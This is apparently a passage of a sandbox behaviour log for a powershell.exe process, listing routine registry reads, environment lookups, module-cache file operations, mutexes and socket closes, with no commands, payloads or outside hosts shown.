| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
3 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HomePath, result_out = \Users\5JgHKoaOfdp |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\5JgHKoaOfdp\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = c:\windows\system32\windowspowershell\v1.0\Modules |
|
1 | |
| Environment | Set Environment String | name = PSMODULEPATH, value = C:\Users\5JgHKoaOfdp\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
3 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds, value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 |
Thread 0x5d8
3
5
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = 5 milliseconds (0.005 seconds) |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Socket | Close | type = SOCK_DGRAM |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Module | Unmap | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe |
|
1 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
Thread 0x3a0
764
51
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Environment | Get Environment String | name = PSModuleAutoLoadingPreference |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
4 | |
| Environment | Get Environment String | name = PSModuleAutoLoadingPreference |
|
1 | |
| Environment | Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL |
|
2 | |
| Environment | Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\Windows\system32, type = file_attributes |
|
15 | |
| File | Get Info | filename = C:\Windows, type = file_attributes |
|
16 | |
| File | Get Info | filename = C:\Windows\System32\Wbem, type = file_attributes |
|
16 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\, type = file_attributes |
|
16 | |
| Environment | Get Environment String | name = PSMODULEPATH |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\5JgHKoaOfdp\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AppLocker\AppLocker.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Appx\Appx.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AssignedAccess\AssignedAccess.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\BitLocker\BitLocker.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetAdapter\NetAdapter.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetConnection\NetConnection.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture\NetEventPacketCapture.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetLbfo\NetLbfo.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetNat\NetNat.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetQos\NetQos.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\.psd1, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 41, size_out = 41 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 2942 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoloadingCacheMaintenance |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppLocker\AppLocker.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess\AssignedAccess.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess\AssignedAccess.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BranchCache\BranchCache.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\CimCmdlets\CimCmdlets.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender\Defender.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DnsClient\DnsClient.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\International\International.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Kds\Kds.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Appx\Appx.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096 |
|
1 | |
| File | Write | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 2983 |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\E. Australia Standard Time |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\E. Australia Standard Time, value_name = TZI, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\E. Australia Standard Time\Dynamic DST |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\E. Australia Standard Time, value_name = MUI_Display, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\E. Australia Standard Time, value_name = MUI_Display, data = @tzres.dll,-680, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\E. Australia Standard Time, value_name = MUI_Std, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\E. Australia Standard Time, value_name = MUI_Std, data = @tzres.dll,-682, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\E. Australia Standard Time, value_name = MUI_Dlt, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\E. Australia Standard Time, value_name = MUI_Dlt, data = @tzres.dll,-681, type = REG_SZ |
|
1 | |
| Module | Load | module_name = C:\Windows\system32\en-US\tzres.dll.mui, base_address = 0xe892b10001 |
|
3 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3e67daab-35d0-4e80-9b43-df246309b2d1, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3e67daab-35d0-4e80-9b43-df246309b2d1, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3e67daab-35d0-4e80-9b43-df246309b2d1, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3e67daab-35d0-4e80-9b43-df246309b2d1, size = 4096, size_out = 3928 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AppLocker\AppLocker.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_50d1a972-c2bc-4be3-857a-6ad57bf37250, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_50d1a972-c2bc-4be3-857a-6ad57bf37250, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_50d1a972-c2bc-4be3-857a-6ad57bf37250, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_50d1a972-c2bc-4be3-857a-6ad57bf37250, size = 4096, size_out = 3222 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Appx\Appx.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_882fc4e8-005d-47a8-b798-e37046e181df, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_882fc4e8-005d-47a8-b798-e37046e181df, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_882fc4e8-005d-47a8-b798-e37046e181df, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_882fc4e8-005d-47a8-b798-e37046e181df, size = 4096, size_out = 3371 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\AssignedAccess\AssignedAccess.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3186b7f4-e38a-40a6-af89-228fb596d0a1, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3186b7f4-e38a-40a6-af89-228fb596d0a1, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3186b7f4-e38a-40a6-af89-228fb596d0a1, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3186b7f4-e38a-40a6-af89-228fb596d0a1, size = 4096, size_out = 2863 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\BitLocker\BitLocker.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_720292a3-508e-47f8-8133-7dbca19a17fa, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_720292a3-508e-47f8-8133-7dbca19a17fa, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_720292a3-508e-47f8-8133-7dbca19a17fa, type = size, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_720292a3-508e-47f8-8133-7dbca19a17fa, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_720292a3-508e-47f8-8133-7dbca19a17fa, size = 26, size_out = 26 |
|
1 | |
| File | Read | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_720292a3-508e-47f8-8133-7dbca19a17fa, size = 4096, size_out = 509 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-3643094112-4209292109-138530109-1001 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\5JgHKoaOfdp\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5713a0d6-d10b-4b74-9a40-4d532ad03618, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
